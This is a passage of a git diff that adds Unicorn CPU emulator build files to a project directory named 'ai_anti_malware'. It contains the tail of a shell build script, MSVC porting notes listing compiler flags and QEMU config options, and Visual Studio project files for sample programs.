UNICORN_ASAN=yes "${MAKE}" V=1 +} + +build_cross() { + [ "$UNAME" = Darwin ] && LIBARCHS="i386 x86_64" + CROSS=$1 + CC=$CROSS-gcc \ + AR=$CROSS-gcc-ar \ + RANLIB=$CROSS-gcc-ranlib \ + ${MAKE} +} + +build_linux32() { + PKG_CONFIG_PATH="/usr/lib/i386-linux-gnu/pkgconfig" \ + CFLAGS=-m32 \ + LDFLAGS=-m32 \ + LDFLAGS_STATIC=-m32 \ + LIBRARY_PATH="/usr/lib/i386-linux-gnu" \ + UNICORN_QEMU_FLAGS="--cpu=i386 ${UNICORN_QEMU_FLAGS}" \ + ${MAKE} +} + +install() { + # Mac OSX needs to find the right directory for pkgconfig + if [ "$UNAME" = Darwin ]; then + # we are going to install into /usr/local, so 
remove old installs under /usr + rm -rf /usr/lib/libunicorn* + rm -rf /usr/include/unicorn + # install into /usr/local + PREFIX=${PREFIX:-/usr/local} + ${MAKE} install + else # not OSX + test -d /usr/lib64 && LIBDIRARCH=lib64 + ${MAKE} install + fi +} + +uninstall() { + # Mac OSX needs to find the right directory for pkgconfig + if [ "$UNAME" = "Darwin" ]; then + # find the directory automatically, so we can support both Macport & Brew + PKGCFGDIR="$(pkg-config --variable pc_path pkg-config | cut -d ':' -f 1)" + PREFIX=${PREFIX:-/usr/local} + ${MAKE} uninstall + else # not OSX + test -d /usr/lib64 && LIBDIRARCH=lib64 + ${MAKE} uninstall + fi +} + +msvc_update_genfiles() { + ${MAKE} + cp qemu/qapi-types.h msvc/unicorn/qapi-types.h + cp qemu/qapi-visit.h msvc/unicorn/qapi-visit.h + cp qemu/qapi-types.c msvc/unicorn/qapi-types.c + cp qemu/qapi-visit.c msvc/unicorn/qapi-visit.c + cp qemu/config-host.h msvc/unicorn/config-host.h + cp qemu/aarch64-softmmu/config-target.h msvc/unicorn/aarch64-softmmu/config-target.h + cp qemu/aarch64eb-softmmu/config-target.h msvc/unicorn/aarch64eb-softmmu/config-target.h + cp qemu/arm-softmmu/config-target.h msvc/unicorn/arm-softmmu/config-target.h + cp qemu/armeb-softmmu/config-target.h msvc/unicorn/armeb-softmmu/config-target.h + cp qemu/m68k-softmmu/config-target.h msvc/unicorn/m68k-softmmu/config-target.h + cp qemu/mips64el-softmmu/config-target.h msvc/unicorn/mips64el-softmmu/config-target.h + cp qemu/mips64-softmmu/config-target.h msvc/unicorn/mips64-softmmu/config-target.h + cp qemu/mipsel-softmmu/config-target.h msvc/unicorn/mipsel-softmmu/config-target.h + cp qemu/mips-softmmu/config-target.h msvc/unicorn/mips-softmmu/config-target.h + cp qemu/sparc64-softmmu/config-target.h msvc/unicorn/sparc64-softmmu/config-target.h + cp qemu/sparc-softmmu/config-target.h msvc/unicorn/sparc-softmmu/config-target.h + cp qemu/x86_64-softmmu/config-target.h msvc/unicorn/x86_64-softmmu/config-target.h +} + +UNAME=${UNAME:-$(uname)} 
+MAKE=${MAKE:-make} +#[ -n "${MAKE_JOBS}" ] && MAKE="$MAKE -j${MAKE_JOBS}" + + +if [ "$UNAME" = SunOS ]; then + MAKE=${MAKE:-gmake} + INSTALL_BIN=ginstall + CC=gcc +fi + +if echo "$UNAME" | grep -q BSD; then + MAKE=gmake + PREFIX=${PREFIX:-/usr/local} +fi + +export CC INSTALL_BIN PREFIX PKGCFGDIR LIBDIRARCH LIBARCHS CFLAGS LDFLAGS + +case "$1" in + "" ) ${MAKE};; + "asan" ) asan;; + "install" ) install;; + "uninstall" ) uninstall;; + "macos-universal" ) MACOS_UNIVERSAL=yes ${MAKE};; + "macos-universal-no" ) MACOS_UNIVERSAL=no ${MAKE};; + "cross-win32" ) build_cross i686-w64-mingw32;; + "cross-win64" ) build_cross x86_64-w64-mingw32;; + "cross-android_arm" ) CROSS=arm-linux-androideabi ${MAKE};; + "cross-android_arm64" ) CROSS=aarch64-linux-android ${MAKE};; + "linux32" ) build_linux32;; + "msvc_update_genfiles" ) msvc_update_genfiles;; + * ) + usage; + exit 1;; +esac diff --git a/ai_anti_malware/unicorn/unicorn-master/msvc.bat b/ai_anti_malware/unicorn/unicorn-master/msvc.bat new file mode 100644 index 0000000..285ea92 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/msvc.bat @@ -0,0 +1,3 @@ +:: build Unicorn MSVC solution from MSVC prompt + +msbuild msvc/unicorn.sln diff --git a/ai_anti_malware/unicorn/unicorn-master/msvc/.gitignore b/ai_anti_malware/unicorn/unicorn-master/msvc/.gitignore new file mode 100644 index 0000000..6b23e35 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/msvc/.gitignore @@ -0,0 +1,3 @@ +unicorn.VC.VC.opendb +unicorn.VC.db +distro diff --git a/ai_anti_malware/unicorn/unicorn-master/msvc/README.TXT b/ai_anti_malware/unicorn/unicorn-master/msvc/README.TXT new file mode 100644 index 0000000..7853b8d --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/msvc/README.TXT @@ -0,0 +1,273 @@ +Unicorn-Engine MSVC Native Port Notes + +Zak Escano - January 2017 + +These notes are to help myself and others with the upkeep of the msvc native port +of unicorn-engine. 
+ + +:: Command line build instructions + + msbuild -m -p:Configuration=Release -p:Platform=Win32 + msbuild -m -p:Configuration=Release -p:Platform=x64 + +Then bundle and release the folder "distro". + + +:: Build settings + +Visual Studio Version: Visual Studio 2017 v15.9.15 +Platform Toolset: Default. Known to work with the 8.1 SDK +Character Set: Use Multi-Byte Character Set +Runtime Library Debug: Multi-threaded Debug (/MTd) +Runtime Library Release: Multi-threaded (/MT) +Precompiled Header: Not Using Precompiled Headers +Additional Options: /wd4018 /wd4244 /wd4267 + + +:: Build advice + +- If you see warnings about spectre-mitigated libraries and then some strange + errors, the errors may be related to the spectre libraries. Install them. + (via the visual studio installation manager) +- The "platform default" target SDK may not actually be installed for you. Try + installing the Windows 8.1 SDK via the visual studio installation manager. + + +:: Changes porting unicorn from GNU/GCC to MSVC. + +There were many many many changes to make this also build in MSVC +while still retaining the ability to build in GNU/GCC. +Most were due to either GCC specific things or MSVC lack of decent +standard C support especially in VS2012. Also some were for +posix/platform specific stuff that is not present in windows. + +Some of the more common changes were: + +* Compatibility for GCC style __attribute__'s. + +* Change GCC switch case ranges to specify every case individually, ie: + "case 1 ... 
3:" changes to "case 1: case 2: case 3:" + +* Change GCC struct member initialisation to the more generic + initialisation of all members in order, ie: + { .value = 1, .stuff = 2 } to { 1, 2 } + +* Remove GCC style macro return values which MSVC does not support, ie: + #define RETURN_ONE(x) ({ some stuff; (void)1; }) + +* Compatibility for posix headers that are missing in windows, ie: + stdbool.h, stdint.h, sys/time.h, unistd.h + + +:: CPU specific libraries + +The gnu/gcc way of building the qemu portion of unicorn-engine involves makefile magic +that builds the same set of source code files multiple times. They are built once for each +supported CPU type and force "#include" a CPU specific header file to re-"#define" +function and variable names that would otherwise be the same for each build. +These multiple builds of the same files are then all linked together to form +the unicorn library. + +As an example when building for "x86_64" cpu type the generated header file "x86_64.h" +is force included and it contains a bunch of defines such as: + #define phys_mem_clean phys_mem_clean_x86_64 +So you can see that it adds the cpu type on to the end of each name in order +to keep the names unique over the multiple builds. + +The way I handle this in MSVC is to build a separate cpu specific library, containing +this set of repeatedly used source code files, for each supported cpu type. +These cpu specific libraries are then linked together to build the unicorn library. + +For each supported CPU type + +* Each CPU specific lib has a "forced include" file specified at: + Configuration Properties -> C/C++ -> Advanced -> Forced Include File + so for x86-64 this is the file "x86_64.h" which is a generated file. + + +:: Other things + +* The Qemu code for GNU/GCC seems to rely on __i386__ or __x86_64__ defined if + the host is 32bit or 64bit respectively. + So when building 32bit libs in msvc we define __i386__. + And when building 64bit libs in msvc we define __x86_64__. 
+ +* There is a tcg-target.c for each target that is included into tcg.c. + This is done using "#include tcg-target.c" + It is NOT built separately as part of the *.c files for the project. + + +:: Info from makefiles + +This info is compiled here together to help with deciding on the build settings to use. +It may or may not be of use to anyone in the future once this all builds ok :) + +QEMU_INCLUDES=-I$(SRC_PATH)/tcg -I$(SRC_PATH)/tcg/$(ARCH) -I. -I$(SRC_PATH) -I$(SRC_PATH)/include +QEMU_CFLAGS=-m32 -D__USE_MINGW_ANSI_STDIO=1 -DWIN32_LEAN_AND_MEAN -DWINVER=0x501 -D_GNU_SOURCE -D_FILE_OFFSET_BITS=64 -D_LARGEFILE_SOURCE -Wstrict-prototypes -Wredundant-decls -Wall -Wundef -Wwrite-strings -Wmissing-prototypes -fno-strict-aliasing -fno-common -DUNICORN_HAS_X86 -DUNICORN_HAS_ARM -DUNICORN_HAS_M68K -DUNICORN_HAS_ARM64 -DUNICORN_HAS_MIPS -DUNICORN_HAS_MIPSEL -DUNICORN_HAS_MIPS64 -DUNICORN_HAS_MIPS64EL -DUNICORN_HAS_SPARC -fPIC +QEMU_CFLAGS += -I.. -I$(SRC_PATH)/target-$(TARGET_BASE_ARCH) -DNEED_CPU_H +QEMU_CFLAGS+=-I$(SRC_PATH)/include +QEMU_CFLAGS+=-include x86_64.h + + includes +-I$(SRC_PATH)/tcg +-I$(SRC_PATH)/tcg/$(ARCH) +-I. +-I$(SRC_PATH) +-I$(SRC_PATH)/include +-I.. 
+-I$(SRC_PATH)/target-$(TARGET_BASE_ARCH) +-I$(SRC_PATH)/include +-include x86_64.h + + defines +-D__USE_MINGW_ANSI_STDIO=1 +-DWIN32_LEAN_AND_MEAN +-DWINVER=0x501 +-D_GNU_SOURCE +-D_FILE_OFFSET_BITS=64 +-D_LARGEFILE_SOURCE +-DNEED_CPU_H +-DUNICORN_HAS_X86 +-DUNICORN_HAS_ARM +-DUNICORN_HAS_M68K +-DUNICORN_HAS_ARM64 +-DUNICORN_HAS_MIPS +-DUNICORN_HAS_MIPSEL +-DUNICORN_HAS_MIPS64 +-DUNICORN_HAS_MIPS64EL +-DUNICORN_HAS_SPARC + + + qemu/config-host.mak + extra_cflags=-m32 -DUNICORN_HAS_X86 -DUNICORN_HAS_ARM -DUNICORN_HAS_M68K -DUNICORN_HAS_ARM64 -DUNICORN_HAS_MIPS -DUNICORN_HAS_MIPSEL -DUNICORN_HAS_MIPS64 -DUNICORN_HAS_MIPS64EL -DUNICORN_HAS_SPARC -fPIC + extra_ldflags= + libs_softmmu= + ARCH=i386 + CONFIG_WIN32=y + CONFIG_FILEVERSION=2,2,1,0 + CONFIG_PRODUCTVERSION=2,2,1,0 + VERSION=2.2.1 + PKGVERSION= + SRC_PATH=/f/GitHub/unicorn/qemu + TARGET_DIRS=x86_64-softmmu arm-softmmu m68k-softmmu aarch64-softmmu mips-softmmu mipsel-softmmu mips64-softmmu mips64el-softmmu sparc-softmmu sparc64-softmmu + GLIB_CFLAGS=-pthread -mms-bitfields -IC:/msys64/mingw32/include/glib-2.0 -IC:/msys64/mingw32/lib/glib-2.0/include + CONFIG_ZERO_MALLOC=y + CONFIG_CPUID_H=y + CONFIG_THREAD_SETNAME_BYTHREAD=y + CONFIG_PTHREAD_SETNAME_NP=y + CFLAGS=-pthread -mms-bitfields -IC:/msys64/mingw32/include/glib-2.0 -IC:/msys64/mingw32/lib/glib-2.0/include -g + + QEMU_CFLAGS=-m32 -D__USE_MINGW_ANSI_STDIO=1 -DWIN32_LEAN_AND_MEAN -DWINVER=0x501 -D_GNU_SOURCE -D_FILE_OFFSET_BITS=64 -D_LARGEFILE_SOURCE -Wstrict-prototypes -Wredundant-decls -Wall -Wundef -Wwrite-strings -Wmissing-prototypes -fno-strict-aliasing -fno-common -DUNICORN_HAS_X86 -DUNICORN_HAS_ARM -DUNICORN_HAS_M68K -DUNICORN_HAS_ARM64 -DUNICORN_HAS_MIPS -DUNICORN_HAS_MIPSEL -DUNICORN_HAS_MIPS64 -DUNICORN_HAS_MIPS64EL -DUNICORN_HAS_SPARC -fPIC + QEMU_INCLUDES=-I$(SRC_PATH)/tcg -I$(SRC_PATH)/tcg/$(ARCH) -I. 
-I$(SRC_PATH) -I$(SRC_PATH)/include + LDFLAGS=-Wl,--nxcompat -Wl,--no-seh -Wl,--dynamicbase -Wl,--warn-common -m32 -g + LIBS+=-LC:/msys64/mingw32/lib -lgthread-2.0 -pthread -lglib-2.0 -lintl -lwinmm -lws2_32 -liphlpapi -lz + + + qemu/x86_64-softmmu/Makefile + QEMU_CFLAGS += -I.. -I$(SRC_PATH)/target-$(TARGET_BASE_ARCH) -DNEED_CPU_H + QEMU_CFLAGS+=-I$(SRC_PATH)/include + + + qemu/x86_64-softmmu/config-target.mak + TARGET_X86_64=y + TARGET_NAME=x86_64 + TARGET_BASE_ARCH=i386 + TARGET_ABI_DIR=x86_64 + CONFIG_SOFTMMU=y + LDFLAGS+= + QEMU_CFLAGS+= + QEMU_CFLAGS+=-include x86_64.h + + + qemu/x86_64-softmmu/config-devices.mak + CONFIG_VGA=y + CONFIG_QXL=$(CONFIG_SPICE) + CONFIG_VGA_PCI=y + CONFIG_VGA_ISA=y + CONFIG_VGA_CIRRUS=y + CONFIG_VMWARE_VGA=y + CONFIG_VMMOUSE=y + CONFIG_SERIAL=y + CONFIG_PARALLEL=y + CONFIG_I8254=y + CONFIG_PCSPK=y + CONFIG_PCKBD=y + CONFIG_FDC=y + CONFIG_ACPI=y + CONFIG_APM=y + CONFIG_I8257=y + CONFIG_IDE_ISA=y + CONFIG_IDE_PIIX=y + CONFIG_NE2000_ISA=y + CONFIG_PIIX_PCI=y + CONFIG_HPET=y + CONFIG_APPLESMC=y + CONFIG_I8259=y + CONFIG_PFLASH_CFI01=y + CONFIG_TPM_TIS=$(CONFIG_TPM) + CONFIG_PCI_HOTPLUG_OLD=y + CONFIG_MC146818RTC=y + CONFIG_PAM=y + CONFIG_PCI_PIIX=y + CONFIG_WDT_IB700=y + CONFIG_XEN_I386=$(CONFIG_XEN) + CONFIG_ISA_DEBUG=y + CONFIG_ISA_TESTDEV=y + CONFIG_VMPORT=y + CONFIG_SGA=y + CONFIG_LPC_ICH9=y + CONFIG_PCI_Q35=y + CONFIG_APIC=y + CONFIG_IOAPIC=y + CONFIG_ICC_BUS=y + CONFIG_PVPANIC=y + CONFIG_MEM_HOTPLUG=y + CONFIG_PCI=y + CONFIG_VIRTIO_PCI=y + CONFIG_VIRTIO=y + CONFIG_USB_UHCI=y + CONFIG_USB_OHCI=y + CONFIG_USB_EHCI=y + CONFIG_USB_XHCI=y + CONFIG_NE2000_PCI=y + CONFIG_EEPRO100_PCI=y + CONFIG_PCNET_PCI=y + CONFIG_PCNET_COMMON=y + CONFIG_AC97=y + CONFIG_HDA=y + CONFIG_ES1370=y + CONFIG_LSI_SCSI_PCI=y + CONFIG_VMW_PVSCSI_SCSI_PCI=y + CONFIG_MEGASAS_SCSI_PCI=y + CONFIG_RTL8139_PCI=y + CONFIG_E1000_PCI=y + CONFIG_VMXNET3_PCI=y + CONFIG_IDE_CORE=y + CONFIG_IDE_QDEV=y + CONFIG_IDE_PCI=y + CONFIG_AHCI=y + CONFIG_ESP=y + CONFIG_ESP_PCI=y + 
CONFIG_SERIAL=y + CONFIG_SERIAL_PCI=y + CONFIG_IPACK=y + CONFIG_WDT_IB6300ESB=y + CONFIG_PCI_TESTDEV=y + CONFIG_NVME_PCI=y + CONFIG_SB16=y + CONFIG_ADLIB=y + CONFIG_GUS=y + CONFIG_CS4231A=y + CONFIG_USB_TABLET_WACOM=y + CONFIG_USB_STORAGE_BOT=y + CONFIG_USB_STORAGE_UAS=y + CONFIG_USB_STORAGE_MTP=y + CONFIG_USB_SMARTCARD=y + CONFIG_USB_AUDIO=y + CONFIG_USB_SERIAL=y + CONFIG_USB_NETWORK=y + CONFIG_USB_BLUETOOTH=y + + + diff --git a/ai_anti_malware/unicorn/unicorn-master/msvc/samples/mem_apis/mem_apis.vcxproj b/ai_anti_malware/unicorn/unicorn-master/msvc/samples/mem_apis/mem_apis.vcxproj new file mode 100644 index 0000000..5d1064b --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/msvc/samples/mem_apis/mem_apis.vcxproj @@ -0,0 +1,176 @@ +<?xml version="1.0" encoding="utf-8"?> +<Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> + <ItemGroup Label="ProjectConfigurations"> + <ProjectConfiguration Include="Debug|Win32"> + <Configuration>Debug</Configuration> + <Platform>Win32</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Debug|x64"> + <Configuration>Debug</Configuration> + <Platform>x64</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Release|Win32"> + <Configuration>Release</Configuration> + <Platform>Win32</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Release|x64"> + <Configuration>Release</Configuration> + <Platform>x64</Platform> + </ProjectConfiguration> + </ItemGroup> + <PropertyGroup Label="Globals"> + <ProjectGuid>{9D588288-5A28-4AB3-96EA-442CAA508F8E}</ProjectGuid> + <Keyword>Win32Proj</Keyword> + <RootNamespace>mem_apis</RootNamespace> + </PropertyGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" /> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration"> + <ConfigurationType>Application</ConfigurationType> + <UseDebugLibraries>true</UseDebugLibraries> + 
<PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <CharacterSet>MultiByte</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration"> + <ConfigurationType>Application</ConfigurationType> + <UseDebugLibraries>true</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <CharacterSet>MultiByte</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration"> + <ConfigurationType>Application</ConfigurationType> + <UseDebugLibraries>false</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <WholeProgramOptimization>true</WholeProgramOptimization> + <CharacterSet>MultiByte</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration"> + <ConfigurationType>Application</ConfigurationType> + <UseDebugLibraries>false</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <WholeProgramOptimization>true</WholeProgramOptimization> + <CharacterSet>MultiByte</CharacterSet> + <SpectreMitigation>false</SpectreMitigation> + </PropertyGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" /> + <ImportGroup Label="ExtensionSettings"> + </ImportGroup> + <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Label="PropertySheets" 
Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <PropertyGroup Label="UserMacros" /> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <LinkIncremental>true</LinkIncremental> + <OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'"> + <LinkIncremental>true</LinkIncremental> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <LinkIncremental>false</LinkIncremental> + <OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> + <LinkIncremental>false</LinkIncremental> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <ClCompile> + <PrecompiledHeader> + </PrecompiledHeader> + <WarningLevel>Level3</WarningLevel> + <Optimization>Disabled</Optimization> + <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;__i386__</PreprocessorDefinitions> + <AdditionalIncludeDirectories>../../../include</AdditionalIncludeDirectories> + <ExceptionHandling>false</ExceptionHandling> + 
<RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary> + </ClCompile> + <Link> + <SubSystem>Console</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <AdditionalLibraryDirectories>$(SolutionDir)$(Platform)\$(Configuration)\</AdditionalLibraryDirectories> + <AdditionalDependencies>kernel32.lib;user32.lib;gdi32.lib;winspool.lib;comdlg32.lib;advapi32.lib;shell32.lib;ole32.lib;oleaut32.lib;uuid.lib;odbc32.lib;odbccp32.lib;%(AdditionalDependencies);unicorn_static.lib</AdditionalDependencies> + </Link> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'"> + <ClCompile> + <PrecompiledHeader> + </PrecompiledHeader> + <WarningLevel>Level3</WarningLevel> + <Optimization>Disabled</Optimization> + <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;__i386__</PreprocessorDefinitions> + <AdditionalIncludeDirectories>../../../include</AdditionalIncludeDirectories> + <ExceptionHandling>false</ExceptionHandling> + <RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary> + </ClCompile> + <Link> + <SubSystem>Console</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <AdditionalLibraryDirectories>$(SolutionDir)$(Platform)\$(Configuration)\</AdditionalLibraryDirectories> + <AdditionalDependencies>kernel32.lib;user32.lib;gdi32.lib;winspool.lib;comdlg32.lib;advapi32.lib;shell32.lib;ole32.lib;oleaut32.lib;uuid.lib;odbc32.lib;odbccp32.lib;%(AdditionalDependencies);unicorn_static.lib</AdditionalDependencies> + </Link> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <ClCompile> + <WarningLevel>Level3</WarningLevel> + <PrecompiledHeader> + </PrecompiledHeader> + <Optimization>MaxSpeed</Optimization> + <FunctionLevelLinking>true</FunctionLevelLinking> + <IntrinsicFunctions>true</IntrinsicFunctions> + 
<PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;__i386__</PreprocessorDefinitions> + <AdditionalIncludeDirectories>../../../include</AdditionalIncludeDirectories> + <ExceptionHandling>false</ExceptionHandling> + <RuntimeLibrary>MultiThreaded</RuntimeLibrary> + <DebugInformationFormat>None</DebugInformationFormat> + </ClCompile> + <Link> + <SubSystem>Console</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <EnableCOMDATFolding>true</EnableCOMDATFolding> + <OptimizeReferences>true</OptimizeReferences> + <AdditionalLibraryDirectories>$(SolutionDir)$(Platform)\$(Configuration)\</AdditionalLibraryDirectories> + <AdditionalDependencies>kernel32.lib;user32.lib;gdi32.lib;winspool.lib;comdlg32.lib;advapi32.lib;shell32.lib;ole32.lib;oleaut32.lib;uuid.lib;odbc32.lib;odbccp32.lib;%(AdditionalDependencies);unicorn_static.lib</AdditionalDependencies> + </Link> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> + <ClCompile> + <WarningLevel>Level3</WarningLevel> + <PrecompiledHeader> + </PrecompiledHeader> + <Optimization>MaxSpeed</Optimization> + <FunctionLevelLinking>true</FunctionLevelLinking> + <IntrinsicFunctions>true</IntrinsicFunctions> + <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;__i386__</PreprocessorDefinitions> + <AdditionalIncludeDirectories>../../../include</AdditionalIncludeDirectories> + <ExceptionHandling>false</ExceptionHandling> + <RuntimeLibrary>MultiThreaded</RuntimeLibrary> + <DebugInformationFormat>None</DebugInformationFormat> + </ClCompile> + <Link> + <SubSystem>Console</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <EnableCOMDATFolding>true</EnableCOMDATFolding> + <OptimizeReferences>true</OptimizeReferences> + <AdditionalLibraryDirectories>$(SolutionDir)$(Platform)\$(Configuration)\</AdditionalLibraryDirectories> + 
<AdditionalDependencies>kernel32.lib;user32.lib;gdi32.lib;winspool.lib;comdlg32.lib;advapi32.lib;shell32.lib;ole32.lib;oleaut32.lib;uuid.lib;odbc32.lib;odbccp32.lib;%(AdditionalDependencies);unicorn_static.lib</AdditionalDependencies> + </Link> + </ItemDefinitionGroup> + <ItemGroup> + <ClCompile Include="..\..\..\samples\mem_apis.c" /> + </ItemGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" /> + <ImportGroup Label="ExtensionTargets"> + </ImportGroup> +</Project> \ No newline at end of file diff --git a/ai_anti_malware/unicorn/unicorn-master/msvc/samples/mem_apis/mem_apis.vcxproj.filters b/ai_anti_malware/unicorn/unicorn-master/msvc/samples/mem_apis/mem_apis.vcxproj.filters new file mode 100644 index 0000000..570aef1 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/msvc/samples/mem_apis/mem_apis.vcxproj.filters @@ -0,0 +1,6 @@ +<?xml version="1.0" encoding="utf-8"?> +<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> + <ItemGroup> + <ClCompile Include="..\..\..\samples\mem_apis.c" /> + </ItemGroup> +</Project> \ No newline at end of file diff --git a/ai_anti_malware/unicorn/unicorn-master/msvc/samples/sample_arm/sample_arm.vcxproj b/ai_anti_malware/unicorn/unicorn-master/msvc/samples/sample_arm/sample_arm.vcxproj new file mode 100644 index 0000000..b1a88f4 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/msvc/samples/sample_arm/sample_arm.vcxproj @@ -0,0 +1,176 @@ +<?xml version="1.0" encoding="utf-8"?> +<Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> + <ItemGroup Label="ProjectConfigurations"> + <ProjectConfiguration Include="Debug|Win32"> + <Configuration>Debug</Configuration> + <Platform>Win32</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Debug|x64"> + <Configuration>Debug</Configuration> + <Platform>x64</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Release|Win32"> + 
<Configuration>Release</Configuration> + <Platform>Win32</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Release|x64"> + <Configuration>Release</Configuration> + <Platform>x64</Platform> + </ProjectConfiguration> + </ItemGroup> + <PropertyGroup Label="Globals"> + <ProjectGuid>{9F32C692-9106-43AF-A291-779A2D8BE096}</ProjectGuid> + <Keyword>Win32Proj</Keyword> + <RootNamespace>sample_arm</RootNamespace> + </PropertyGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" /> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration"> + <ConfigurationType>Application</ConfigurationType> + <UseDebugLibraries>true</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <CharacterSet>MultiByte</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration"> + <ConfigurationType>Application</ConfigurationType> + <UseDebugLibraries>true</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <CharacterSet>MultiByte</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration"> + <ConfigurationType>Application</ConfigurationType> + <UseDebugLibraries>false</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <WholeProgramOptimization>true</WholeProgramOptimization> + <CharacterSet>MultiByte</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration"> + <ConfigurationType>Application</ConfigurationType> + <UseDebugLibraries>false</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <WholeProgramOptimization>true</WholeProgramOptimization> + <CharacterSet>MultiByte</CharacterSet> + <SpectreMitigation>false</SpectreMitigation> + </PropertyGroup> + <Import 
